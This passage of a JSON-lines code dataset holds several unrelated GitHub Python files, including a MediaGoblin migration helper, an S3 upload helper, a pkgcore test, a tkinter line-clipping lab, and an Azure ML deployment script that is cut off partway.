0 is the default \"no migrations\" state!\n \"\"\"\n def __init__(self, migration_number, migration_registry):\n assert migration_number > 0, \"Migration number must be > 0!\"\n assert migration_number not in migration_registry, \\\n \"Duplicate migration numbers detected! That's not allowed!\"\n\n self.migration_number = migration_number\n self.migration_registry = migration_registry\n\n def __call__(self, migration):\n self.migration_registry[self.migration_number] = migration\n return migration\n\n\ndef assure_migrations_table_setup(db):\n \"\"\"\n Make sure the migrations table is set up in the database.\n \"\"\"\n from mediagoblin.db.models import MigrationData\n\n if not MigrationData.__table__.exists(db.bind):\n MigrationData.metadata.create_all(\n db.bind, tables=[MigrationData.__table__])\n\n\ndef inspect_table(metadata, table_name):\n \"\"\"Simple helper to get a ref to an already existing table\"\"\"\n return Table(table_name, metadata, autoload=True,\n autoload_with=metadata.bind)\n\ndef replace_table_hack(db, old_table, replacement_table):\n \"\"\"\n A function to fully replace a current table with a new one for migrati-\n -ons. This is necessary because some changes are made tricky in some situa-\n -tion, for example, dropping a boolean column in sqlite is impossible w/o\n this method\n\n :param old_table A ref to the old table, gotten through \n inspect_table\n\n :param replacement_table A ref to the new table, gotten through\n inspect_table\n\n Users are encouraged to sqlalchemy-migrate replace table solutions, unless\n that is not possible... in which case, this solution works,\n at least for sqlite.\n \"\"\"\n surviving_columns = replacement_table.columns.keys()\n old_table_name = old_table.name\n for row in db.execute(select(\n [column for column in old_table.columns\n if column.name in surviving_columns])):\n\n db.execute(replacement_table.insert().values(**row))\n db.commit()\n\n old_table.drop()\n db.commit()\n\n replacement_table.rename(old_table_name)\n db.commit()\n","repo_name":"jparyani/mediagoblin","sub_path":"mediagoblin/db/migration_tools.py","file_name":"migration_tools.py","file_ext":"py","file_size_in_byte":12141,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"44"} +{"seq_id":"14606421362","text":"class Rectangle:\r\n def __init__ (self,color=\"green\", width=100,height=100, change = 0):\r\n self.color = color\r\n self.width = width\r\n self.height = height\r\n self.change = change\r\n def square(self):\r\n return self.width *self.height\r\n def setchange(self,number):\r\n self.change = number\r\n print(self.change)\r\nrect1 = Rectangle()\r\nprint(rect1.color)\r\nprint(rect1.square())\r\nrect1 = Rectangle(\"yellow\",23,34)\r\nprint(rect1.color)\r\nprint(rect1.square())\r\nprint(\"-----------------------------------\")\r\nprint(rect1.change)\r\nrect1.setchange(5) \r\n","repo_name":"sobakaubivakaa/5classes","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25666189498","text":"\"\"\"S3 helper using Boto3.\"\"\"\n\nimport boto3\nfrom flask import current_app\n\n\ndef upload_file_to_s3(image, fileStoreObj, acl=\"public-read\"):\n \"\"\"S3 file uploader.\"\"\"\n app = current_app._get_current_object()\n\n s3 = boto3.client(\n \"s3\",\n aws_access_key_id=app.config['S3_KEY'],\n aws_secret_access_key=app.config['S3_SECRET']\n )\n\n try:\n s3.put_object(Body=image,\n 
Bucket=app.config['S3_BUCKET'],\n ACL=acl,\n ContentType=fileStoreObj.content_type,\n Key=fileStoreObj.filename)\n\n except Exception as e:\n print(\"An Error occurred: \", e)\n return e\n return \"{}{}\".format(app.config[\"S3_LOCATION\"],\n fileStoreObj.filename)\n","repo_name":"SchlachterSchmidt/stationary-octo-engine","sub_path":"app/helpers/s3_helper.py","file_name":"s3_helper.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12664687733","text":"from pkgcore.pkgsets import installed\nfrom pkgcore.repository.util import SimpleTree\nfrom pkgcore.test import TestCase\n\n\nclass FakePkg(object):\n\n package_is_real = True\n\n def __init__(self, *key):\n self.key = key\n\n @property\n def slotted_atom(self):\n return \"%s/%s\" % self.key[:2]\n\n @property\n def versioned_atom(self):\n return '%s/%s-%s' % self.key\n\n\nclass TestInstalled(TestCase):\n\n def test_iter(self):\n fake_vdb = SimpleTree({\"dev-util\": {\"diffball\":[\"1.0\"],\n \"bsdiff\":[\"1.2\", \"1.3\"]}}, pkg_klass=FakePkg)\n ipkgset = installed.Installed([fake_vdb])\n self.assertEqual(sorted([\"dev-util/diffball\",\n \"dev-util/bsdiff\", \"dev-util/bsdiff\"]),\n sorted(ipkgset))\n vpkgset = installed.VersionedInstalled([fake_vdb])\n self.assertEqual(sorted([\"dev-util/diffball-1.0\",\n \"dev-util/bsdiff-1.2\", \"dev-util/bsdiff-1.3\"]),\n sorted(vpkgset))\n","repo_name":"pombreda/pkgcore","sub_path":"pkgcore/test/pkgsets/test_installed.py","file_name":"test_installed.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27501640968","text":"from clase_manejafacultad import *\r\nif __name__ == '__main__':\r\n\tmanejador=ManejaFacultades()\r\n\tmanejador.leerArchivo()\r\n\topc=None\r\n\twhile(opc!=0):\r\n\t\tprint('\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t---MENU DE OPCIONES---')\r\n\t\tprint('1. Ingresar el código de una facultad y mostrar nombre de la facultad, nombre y duración de cada una de las carreras que se dictan en esa facultad.')\r\n\t\tprint('2. Dado el nombre de una carrera, mostrar código (se conforma con número de código de Facultad y código de carrera), nombre y localidad de la facultad donde esta se dicta.')\r\n\t\tprint('0. 
Terminar y cerrar programa.\\n\\n\\t\\t\\t')\r\n\t\topc=int(input('Ingrese opcion: '))\r\n\r\n\t\tif opc==1:\r\n\t\t\tcodigo=input('Ingrese codigo de facultad:\\n')\r\n\t\t\tmanejador.mostrar(codigo)\r\n\t\telif opc==2:\r\n\t\t\tnombre=input('Ingrese nombre de la carrera\\n')\r\n\t\t\tmanejador.recorreFac(nombre)\r\nprint('adiosito vuelva pronto<3')","repo_name":"melibul/POO-Unidad-3-","sub_path":"Ejercicio 1/main_ejercicio1.py","file_name":"main_ejercicio1.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38267809225","text":"import traceback\n\n\nclass Error:\n \"\"\"\n Error is the error data wrapper use to upload errors to the error server\n \"\"\"\n\n def __init__(self, error: Exception, title: str, timestamp: float, metrics_id: str):\n self.error: Exception = error\n self.title: str = str(title)\n self.first_timestamp: float = timestamp\n self.last_timestamp: float = timestamp\n self.count: int = 1\n self.metrics_id: str = metrics_id\n self.type: str = self.error.__class__.__name__ if self.error else \"\"\n self.stacktrace: list = traceback.format_exception(\n type(self.error), value=self.error, tb=self.error.__traceback__\n )[1:] if self.error and isinstance(self.error, Exception) else []\n\n def to_dict(self) -> dict:\n \"\"\"\n Return the dict serialization of self\n \"\"\"\n return {\n \"title\": self.title,\n \"type\": self.type,\n \"stacktrace\": self.stacktrace,\n \"firsttimestamp\": self.first_timestamp,\n \"lasttimestamp\": self.last_timestamp,\n \"count\": self.count,\n \"metricsid\": self.metrics_id,\n }\n\n def is_equivalent(self, other) -> bool:\n return (self.error is other.error or\n (type(self.error) is type(other.error)\n and self.error.args == other.error.args)) and \\\n self.title == other.title and \\\n self.metrics_id == other.metrics_id and \\\n self.type == other.type and \\\n self.stacktrace == other.stacktrace\n\n def merge_equivalent(self, other):\n self.count += other.count\n if other.last_timestamp > self.last_timestamp:\n self.last_timestamp = other.last_timestamp\n","repo_name":"Drakkar-Software/OctoBot","sub_path":"octobot/community/errors_upload/error_model.py","file_name":"error_model.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":2434,"dataset":"github-code","pt":"44"} +{"seq_id":"16219299549","text":"from tkinter import Tk, Button, Label, Entry, END, Listbox, Canvas, Radiobutton, LEFT, RIGHT, IntVar, PhotoImage\nfrom tkinter import messagebox\nfrom math import sqrt, acos, degrees, pi, sin, cos, radians, floor, fabs\nimport copy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom time import time, sleep\n\nimport colorutils as cu\n\n\nWIN_WIDTH = 1500\nWIN_HEIGHT = 900\nWIN_COLOR = \"#bf80ff\"\n\nCV_WIDE = 900\nCV_HEIGHT = 900\nCV_COLOR = \"#ffffff\" #f3e6ff\" #\"#cce6ff\"\nMAIN_TEXT_COLOR = \"#b566ff\" #\"lightblue\" a94dff\nTEXT_COLOR = \"#ce99ff\"\n\nTEMP_SIDE_COLOR_CHECK = (255, 0, 255) # purple\nTEMP_SIDE_COLOR = \"#ff00ff\"\n\nBOX_COLOR = \"#dab3ff\"\n\nCOLOR_LINE = \"#000002\" #(0, 0, 0) # black\nCOLOR_LINE_CHECK = (0, 0, 2)\n\nFILL_COLOR = \"#ff6e41\"\n\n# Define\n\nX_MIN = 0\nX_MAX = 1\nY_MIN = 2\nY_MAX = 3\n\nX_DOT = 0\nY_DOT = 1\n\n# For rectangle\nis_set_rect = False\n\n\ndef check_option(option):\n messagebox.showinfo(\"Выбран\", \"Выбрана опция %d\" %(option))\n\n\ndef clear_canvas():\n canvas_win.delete(\"all\")\n\n\ndef get_fill_check_color(collor_fill):\n return 
(int(collor_fill[1:3], 16), int(collor_fill[3:5], 16), int(collor_fill[5:7], 16))\n\n\ndef reboot_prog():\n global lines\n global rect\n\n canvas_win.delete(\"all\")\n\n lines = [[]]\n rect = [-1, -1, -1, -1]\n\n\ndef parse_color(num_color):\n color = \"orange\"\n\n if (num_color == 1):\n color = \"#ff6e41\" #\"orange\"\n elif (num_color == 2):\n color = \"#ff5733\" #\"red\"\n elif (num_color == 3):\n color = \"#0055ff\" #\"blue\"\n elif (num_color == 4):\n color = \"#45ff00\" #\"green\"\n\n return color\n\n\ndef add_rect_click1(event):\n global is_set_rect\n\n is_set_rect = False\n\n\ndef add_rect_click(event):\n global rect\n global is_set_rect\n\n cutter_color = parse_color(option_color_cutter.get())\n\n if (is_set_rect == False):\n rect[X_MIN] = event.x\n rect[Y_MAX] = event.y\n\n is_set_rect = True\n else:\n x_first = rect[X_MIN]\n y_first = rect[Y_MAX]\n\n x = event.x\n y = event.y\n\n #canvas_win.create_rectangle(x_first, y_first, x_old, y_old, outline = \"white\")\n canvas_win.delete(\"all\")\n canvas_win.create_rectangle(x_first, y_first, x, y, outline = cutter_color)\n\n rect[X_MAX] = x\n rect[Y_MIN] = y\n\n draw_lines()\n\n \ndef add_rect():\n global rect\n\n try:\n x_min = int(xleft_cutter_entry.get())\n y_max = int(yleft_cutter_entry.get())\n x_max = int(xright_cutter_entry.get())\n y_min = int(yright_cutter_entry.get())\n except:\n messagebox.showinfo(\"Ошибка\", \"Неверно введены координаты\")\n return\n\n cutter_color = parse_color(option_color_cutter.get())\n\n canvas_win.delete(\"all\")\n canvas_win.create_rectangle(x_min, y_max, x_max, y_min, outline = cutter_color)\n\n rect = [x_min, x_max, y_min, y_max]\n\n draw_lines()\n\n\ndef draw_lines():\n\n for line in lines:\n if (len(line) != 0):\n x1 = line[0][0]\n y1 = line[0][1]\n\n x2 = line[1][0]\n y2 = line[1][1]\n\n color_line = line[2]\n\n #bresenham_int([x1, y1], [x2, y2], line_color)\n\n canvas_win.create_line(x1, y1, x2, y2, fill = color_line)\n\n\ndef add_vert_horiz_lines():\n global lines\n global rect\n\n if (rect[0] == -1):\n messagebox.showerror(\"Ошибка\", \"Отсекатель не задан\")\n return\n\n line_color = parse_color(option_color_line.get())\n\n x1 = rect[X_MIN]\n y1 = rect[Y_MAX]\n x2 = rect[X_MAX]\n y2 = rect[Y_MIN]\n\n dy = y2 - y1\n dx = x2 - x1\n\n lines.append([[x1, y1 + 0.1 * dy], [x1, y2 - 0.1 * dy], line_color]) # vertical line on cutter\n lines.append([[x1 + 0.1 * dx, y1], [x2 - 0.1 * dx, y1], line_color]) # horizontal line on cutter\n\n canvas_win.create_line(x1, y1 + 0.1 * dy, x1, y2 - 0.1 * dy, fill = line_color)\n canvas_win.create_line(x1 + 0.1 * dx, y1, x2 - 0.1 * dx, y1, fill = line_color)\n\n lines.append(list())\n\n\ndef add_line_click(event):\n\n line_color = parse_color(option_color_line.get())\n \n x = event.x\n y = event.y\n\n cur_line = len(lines) - 1\n\n if (len(lines[cur_line]) == 0):\n lines[cur_line].append([x, y])\n else:\n lines[cur_line].append([x, y])\n lines[cur_line].append(line_color)\n lines.append(list())\n\n x1 = lines[cur_line][0][0]\n y1 = lines[cur_line][0][1]\n\n x2 = lines[cur_line][1][0]\n y2 = lines[cur_line][1][1]\n\n canvas_win.create_line(x1, y1, x2, y2, fill = line_color)\n\n\ndef add_line():\n global lines\n\n try:\n x1 = int(x_start_line_entry.get())\n y1 = int(y_start_line_entry.get())\n x2 = int(x_end_line_entry.get())\n y2 = int(y_end_line_entry.get())\n except:\n messagebox.showinfo(\"Ошибка\", \"Неверно введены координаты\")\n return\n\n cur_line = len(lines) - 1\n line_color = parse_color(option_color_line.get())\n\n lines[cur_line].append([x1, y1])\n 
lines[cur_line].append([x2, y2])\n lines[cur_line].append(line_color)\n\n lines.append(list())\n \n canvas_win.create_line(x1, y1, x2, y2, fill = line_color)\n\n\n# Algorithm\n\ndef get_dot_bits(rect, dot):\n bits = 0b0000\n\n #print(rect, dot)\n\n if (dot[X_DOT] < rect[X_MIN]):\n bits += 0b0001\n\n if (dot[X_DOT] > rect[X_MAX]):\n bits += 0b0010\n \n if (dot[Y_DOT] > rect[Y_MIN]): # из-за экранной системы координат поменены\n bits += 0b0100\n \n if (dot[Y_DOT] < rect[Y_MAX]): # из-за экранной системы координат поменены\n bits += 0b1000\n\n return bits\n\n\ndef check_visible(dot1_bits, dot2_bits):\n\n vision = 0 # частично видимый\n\n if (dot1_bits == 0 and dot2_bits == 0):\n vision = 1 # видим\n elif (dot1_bits & dot2_bits):\n vision = -1 # не видим\n\n return vision\n\n\ndef get_bit(dot_bits, i):\n return (dot_bits >> i) & 1\n\n\ndef are_bits_equal(dot1_bits, dot2_bits, i):\n\n if get_bit(dot1_bits, i) == get_bit(dot2_bits, i):\n return True\n\n return False\n\n\ndef method_sazerland_kohen(rect, line):\n dot1 = [line[0][X_DOT], line[0][Y_DOT]]\n dot2 = [line[1][X_DOT], line[1][Y_DOT]]\n\n fl = 0\n\n if (dot1[X_DOT] == dot2[X_DOT]):\n fl = -1 # вертикальный\n else:\n m = (dot2[Y_DOT] - dot1[Y_DOT]) / (dot2[X_DOT] - dot1[X_DOT])\n\n if (m == 0):\n fl = 1 # горизонтальный\n\n for i in range(4):\n dot1_bits = get_dot_bits(rect, dot1)\n dot2_bits = get_dot_bits(rect, dot2)\n\n vision = check_visible(dot1_bits, dot2_bits)\n\n if (vision == -1):\n return # выйти и не рисовать\n elif (vision == 1):\n break # нарисовать и выйти\n\n if (are_bits_equal(dot1_bits, dot2_bits, i)):\n continue\n\n if get_bit(dot1_bits, i) == 0:\n tmp = dot1\n dot1 = dot2\n dot2 = tmp\n\n if (fl != -1):\n if (i < 2):\n dot1[Y_DOT] = m * (rect[i] - dot1[X_DOT]) + dot1[Y_DOT]\n dot1[X_DOT] = rect[i]\n continue\n else:\n dot1[X_DOT] = (1 / m) * (rect[i] - dot1[Y_DOT]) + dot1[X_DOT]\n\n dot1[Y_DOT] = rect[i]\n\n res_color = parse_color(option_color_cut_line.get())\n\n canvas_win.create_line(dot1[X_DOT], dot1[Y_DOT], dot2[X_DOT], dot2[Y_DOT], fill = res_color)\n \n\ndef cut_area():\n global rect\n\n if (rect[0] == -1):\n messagebox.showinfo(\"Ошибка\", \"Не задан отсекатель\")\n\n rect = [min(rect[0], rect[1]), max(rect[0], rect[1]), max(rect[2], rect[3]), min(rect[2], rect[3])]\n\n canvas_win.create_rectangle(rect[X_MIN] + 1, rect[Y_MAX] + 1, rect[X_MAX] - 1, rect[Y_MIN] - 1, fill = \"white\", outline = \"white\")\n \n for line in lines:\n if (line):\n method_sazerland_kohen(rect, line)\n\n\n\n\nif __name__ == \"__main__\":\n '''\n Основной графический модуль\n '''\n\n win = Tk()\n win['bg'] = WIN_COLOR\n win.geometry(\"%dx%d\" %(WIN_WIDTH, WIN_HEIGHT))\n win.title(\"Лабораторная работа #7 (Цветков И.А. 
ИУ7-43Б)\")\n win.resizable(False, False)\n\n canvas_win = Canvas(win, width = CV_WIDE, height = CV_HEIGHT, bg = CV_COLOR)\n canvas_win.place(x = 0, y = 0)\n\n # Binds\n\n lines = [[]]\n canvas_win.bind(\"<3>\", add_line_click)\n\n rect = [-1, -1, -1, -1]\n canvas_win.bind(\"<1>\", add_rect_click1)\n canvas_win.bind('', add_rect_click)\n \n canvas_win.bind('LeftCtrl', add_vert_horiz_lines)\n\n # Add cutter\n\n back_box = Label(text = \"\", font=\"-family {Consolas} -size 16\", width = 43, height = 6, bg = BOX_COLOR)\n back_box.place(x = CV_WIDE + 20, y = 10)\n\n cutter_text = Label(win, text = \"Координаты отсекателя\", width = 43, font=\"-family {Consolas} -size 16\", bg = MAIN_TEXT_COLOR)\n cutter_text.place(x = CV_WIDE + 20, y = 10)\n\n xleft_cutter_text = Label(text = \"Левый верхний x: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n xleft_cutter_text.place(x = CV_WIDE + 20, y = 50)\n\n xleft_cutter_entry = Entry(font=\"-family {Consolas} -size 14\", width = 9)\n xleft_cutter_entry.place(x = CV_WIDE + 210, y = 50)\n\n yleft_cutter_text = Label(text = \"y: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n yleft_cutter_text.place(x = CV_WIDE + 360, y = 50)\n\n yleft_cutter_entry = Entry(font=\"-family {Consolas} -size 14\", width = 9)\n yleft_cutter_entry.place(x = CV_WIDE + 390, y = 50)\n\n\n xright_cutter_text = Label(text = \"Правый нижний x: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n xright_cutter_text.place(x = CV_WIDE + 20, y = 90)\n\n xright_cutter_entry = Entry(font=\"-family {Consolas} -size 14\", width = 9)\n xright_cutter_entry.place(x = CV_WIDE + 210, y = 90)\n\n yright_cutter_text = Label(text = \"y: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n yright_cutter_text.place(x = CV_WIDE + 360, y = 90)\n\n yright_cutter_entry = Entry(font=\"-family {Consolas} -size 14\", width = 9)\n yright_cutter_entry.place(x = CV_WIDE + 390, y = 90)\n\n\n add_cutter_btn = Button(win, text = \"Нарисовать отсекатель\", font=\"-family {Consolas} -size 14\", command = lambda: add_rect())\n add_cutter_btn.place(x = CV_WIDE + 170, y = 130)\n\n\n # Add line\n\n back_box = Label(text = \"\", font=\"-family {Consolas} -size 16\", width = 43, height = 6, bg = BOX_COLOR)\n back_box.place(x = CV_WIDE + 20, y = 190)\n\n cutter_text = Label(win, text = \"Добавить отрезок\", width = 43, font=\"-family {Consolas} -size 16\", bg = MAIN_TEXT_COLOR)\n cutter_text.place(x = CV_WIDE + 20, y = 190)\n\n\n x_start_line_text = Label(text = \"Начало x: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n x_start_line_text.place(x = CV_WIDE + 20, y = 230)\n\n x_start_line_entry = Entry(font=\"-family {Consolas} -size 14\", width = 9)\n x_start_line_entry.place(x = CV_WIDE + 130, y = 230)\n\n y_start_line_text = Label(text = \"y: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n y_start_line_text.place(x = CV_WIDE + 360, y = 230)\n\n y_start_line_entry = Entry(font=\"-family {Consolas} -size 14\", width = 9)\n y_start_line_entry.place(x = CV_WIDE + 390, y = 230)\n\n\n x_end_line_text = Label(text = \"Конец x: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n x_end_line_text.place(x = CV_WIDE + 20, y = 270)\n\n x_end_line_entry = Entry(font=\"-family {Consolas} -size 14\", width = 9)\n x_end_line_entry.place(x = CV_WIDE + 130, y = 270)\n\n y_end_line_text = Label(text = \"y: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n y_end_line_text.place(x = CV_WIDE + 360, y = 270)\n\n y_end_line_entry = Entry(font=\"-family {Consolas} -size 
14\", width = 9)\n y_end_line_entry.place(x = CV_WIDE + 390, y = 270)\n\n\n add_line_btn = Button(win, text = \"Нарисовать отрезок\", font=\"-family {Consolas} -size 14\", command = lambda: add_line())\n add_line_btn.place(x = CV_WIDE + 190, y = 305)\n\n\n # TODO Choose cutter color \n\n back_box_filling = Label(text = \"\", font=\"-family {Consolas} -size 16\", width = 43, height = 4, bg = BOX_COLOR)\n back_box_filling.place(x = CV_WIDE + 20, y = 375)\n\n color_text = Label(win, text = \"Выбрать цвет отсекателя\", width = 43, font=\"-family {Consolas} -size 16\", bg = MAIN_TEXT_COLOR)\n color_text.place(x = CV_WIDE + 20, y = 375)\n\n option_color_cutter = IntVar()\n option_color_cutter.set(1)\n\n color_cutter_orange = Radiobutton(text = \"Оранжевый\", font=\"-family {Consolas} -size 14\", variable = option_color_cutter, value = 1, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cutter_orange.place(x = CV_WIDE + 25, y = 405)\n\n color_cutter_red = Radiobutton(text = \"Красный\", font=\"-family {Consolas} -size 14\", variable = option_color_cutter, value = 2, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cutter_red.place(x = CV_WIDE + 400, y = 405)\n\n color_cutter_blue = Radiobutton(text = \"Синий\", font=\"-family {Consolas} -size 14\", variable = option_color_cutter, value = 3, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cutter_blue.place(x = CV_WIDE + 25, y = 445)\n\n color_cutter_green = Radiobutton(text = \"Зеленый\", font=\"-family {Consolas} -size 14\", variable = option_color_cutter, value = 4, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cutter_green.place(x = CV_WIDE + 400, y = 445)\n\n\n # TODO Choose line color \n\n back_box_filling = Label(text = \"\", font=\"-family {Consolas} -size 16\", width = 43, height = 4, bg = BOX_COLOR)\n back_box_filling.place(x = CV_WIDE + 20, y = 495)\n\n color_text = Label(win, text = \"Выбрать цвет отрезка\", width = 43, font=\"-family {Consolas} -size 16\", bg = MAIN_TEXT_COLOR)\n color_text.place(x = CV_WIDE + 20, y = 495)\n\n option_color_line = IntVar()\n option_color_line.set(3)\n\n color_line_orange = Radiobutton(text = \"Оранжевый\", font=\"-family {Consolas} -size 14\", variable = option_color_line, value = 1, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_line_orange.place(x = CV_WIDE + 25, y = 535)\n\n color_line_red = Radiobutton(text = \"Красный\", font=\"-family {Consolas} -size 14\", variable = option_color_line, value = 2, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_line_red.place(x = CV_WIDE + 400, y = 535)\n\n color_line_blue = Radiobutton(text = \"Синий\", font=\"-family {Consolas} -size 14\", variable = option_color_line, value = 3, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_line_blue.place(x = CV_WIDE + 25, y = 565)\n\n color_line_green = Radiobutton(text = \"Зеленый\", font=\"-family {Consolas} -size 14\", variable = option_color_line, value = 4, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_line_green.place(x = CV_WIDE + 400, y = 565)\n\n\n # TODO Choose cut line color \n\n back_box_filling = Label(text = \"\", font=\"-family {Consolas} -size 16\", width = 43, height = 4, bg = BOX_COLOR)\n back_box_filling.place(x = CV_WIDE + 20, y = 615)\n\n color_text = Label(win, text = \"Выбрать цвет 
результата\", width = 43, font=\"-family {Consolas} -size 16\", bg = MAIN_TEXT_COLOR)\n color_text.place(x = CV_WIDE + 20, y = 615)\n\n option_color_cut_line = IntVar()\n option_color_cut_line.set(4)\n\n color_cut_line_orange = Radiobutton(text = \"Оранжевый\", font=\"-family {Consolas} -size 14\", variable = option_color_cut_line, value = 1, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cut_line_orange.place(x = CV_WIDE + 25, y = 655)\n\n color_cut_line_red = Radiobutton(text = \"Красный\", font=\"-family {Consolas} -size 14\", variable = option_color_cut_line, value = 2, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cut_line_red.place(x = CV_WIDE + 400, y = 655)\n\n color_cut_line_blue = Radiobutton(text = \"Синий\", font=\"-family {Consolas} -size 14\", variable = option_color_cut_line, value = 3, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cut_line_blue.place(x = CV_WIDE + 25, y = 685)\n\n color_cut_line_green = Radiobutton(text = \"Зеленый\", font=\"-family {Consolas} -size 14\", variable = option_color_cut_line, value = 4, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cut_line_green.place(x = CV_WIDE + 400, y = 685)\n\n\n add_vert_horiz_lines_btn = Button(win, text = \"Добавить вертикальный и\\nгоризонтальный отрезки\", width = 35, height = 2, font=\"-family {Consolas} -size 14\", command = lambda: add_vert_horiz_lines())\n add_vert_horiz_lines_btn.place(x = CV_WIDE + 100, y = 750)\n\n cut_btn = Button(win, text = \"Отсечь\", width = 18, height = 2, font=\"-family {Consolas} -size 14\", command = lambda: cut_area())\n cut_btn.place(x = CV_WIDE + 20, y = 830)\n\n clear_btn = Button(win, text = \"Очистить экран\", width = 18, height = 2, font=\"-family {Consolas} -size 14\", command = lambda: reboot_prog())\n clear_btn.place(x = CV_WIDE + 350, y = 830)\n\n\n\n win.mainloop()","repo_name":"amunra2/cg-bmstu-iu7","sub_path":"lab_07/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17674,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"6501107045","text":"#!/usr/bin/env python3\n\n# Created by: Michael Clermont\n# Created on: Feb 2022\n# This program calculates the price of a pizza\n# with diameter inputted by the user and HST\n\nimport constants\n\n\ndef main():\n # this function calculates the circumference\n\n # input\n diameter = float(input(\"Enter the diameter of the pizza (inch): \"))\n\n # process\n pizza_price = (\n constants.LABOR + constants.RENT + (diameter * constants.COST_PER_INCH)\n )\n total = pizza_price + (pizza_price * constants.HST)\n\n # output\n print(\"\")\n print(\"The cost for a {0} inch pizza is: ${1:,.2f}\".format(diameter, total))\n print(\"\\nDone.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"michael-clermont1/ICS3U-Unit2-04-Python","sub_path":"pizza_diameter.py","file_name":"pizza_diameter.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3850746883","text":"\"\"\"\nFunctions to deploy service\n(RELEASE pipeline)\n\nTo run locally, use:\n> cd ./root\n> conda activate nlp\n> python deploy/service.py --project_name msforum_en --do_deploy\n\"\"\"\nimport os\nimport json\nimport shutil\nimport logging\nimport argparse\n\nfrom azureml.core import Workspace, Experiment, Model, Webservice\nfrom 
azureml.core.authentication import InteractiveLoginAuthentication\nfrom azureml.core.resource_configuration import ResourceConfiguration\nfrom azureml.core.webservice import AciWebservice, AksWebservice\nfrom azureml.core import Environment\nfrom azureml.core.conda_dependencies import CondaDependencies\nfrom azureml.core.model import InferenceConfig\nfrom azureml.exceptions import WebserviceException\n\n# Custom Functions\nimport sys \nsys.path.append('./src')\nimport helper as he\n\n############################################\n##### Parameters\n############################################\n\n## Arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--project_name\", \n default='msforum_en',\n type=str)\nparser.add_argument('--do_deploy',\n action='store_true')\nparser.add_argument('--show_output',\n action='store_true')\nargs = parser.parse_args()\n\n## Load \nparams = he.get_project_config(f'{args.project_name}.config.json')\nlanguage = params.get('language')\nenv = params.get('environment')\n\n############################################\n##### AML Setup\n############################################\n\n## Workspace\nws = he.get_aml_ws()\n\n# Python dependencies\npip_packages=he.get_requirements(req_type='deploy')\n\n## Local Config\nfn_config_infer = 'config.json'\nshutil.copy(f'./project/{args.project_name}.config.json', f'./src/{fn_config_infer}')\n\nscript_folder = \".\"\ntasks = params.get(\"tasks\")\ndeploy = params.get(\"deploy\")\n\n############################################\n##### DEPLOY\n############################################\n\nversion = '0.2'\nauth_enabled = True\n\nif args.do_deploy:\n logging.warning(f'[INFO] Running deploy for {args.project_name}')\n # Fetch Models\n models = []\n for task in tasks:\n model_name = f'{args.project_name}-model-{task}'\n if tasks.get(task)['type'] in ['ner', 'om']: \n # NOTE: tasks 3 and 5 do not have a model\n continue\n model = Model(ws, model_name)\n models.append(\n model\n )\n logging.warning(f'[INFO] Added Model : {model.name} (v{model.version})')\n \n # Deployment Target\n if deploy.get('type') == 'ACI':\n compute_config = AciWebservice.deploy_configuration(cpu_cores=deploy.get('cpu'), memory_gb=deploy.get('memory'), auth_enabled=auth_enabled) #2\n elif deploy.get('type') == 'AKS':\n compute_config = AksWebservice.deploy_configuration()\n \n # Prepare Environment\n environment = Environment('env')\n conda_packages = ['pytorch', 'torchvision']\n pip_packages = ['azureml-defaults'] + pip_packages\n environment.python.conda_dependencies = CondaDependencies.create(pip_packages=pip_packages,\n conda_packages=conda_packages)\n\n inference_config = InferenceConfig(entry_script='src/infer.py',\n source_directory='.',\n environment=environment)\n \n # Create or update service\n service_name = f'{args.project_name}-{env}'.replace('_','-')\n ## Create web service\n service = Model.deploy(workspace=ws, \n name=service_name, \n models=models, \n inference_config=inference_config, \n deployment_config=compute_config, \n overwrite=True)\n logging.warning('[INFO] Creating web service')\n service.wait_for_deployment(show_output=args.show_output)\n\n # Get service details\n logging.warning(service.get_keys)\n\n # Test service\n try:\n 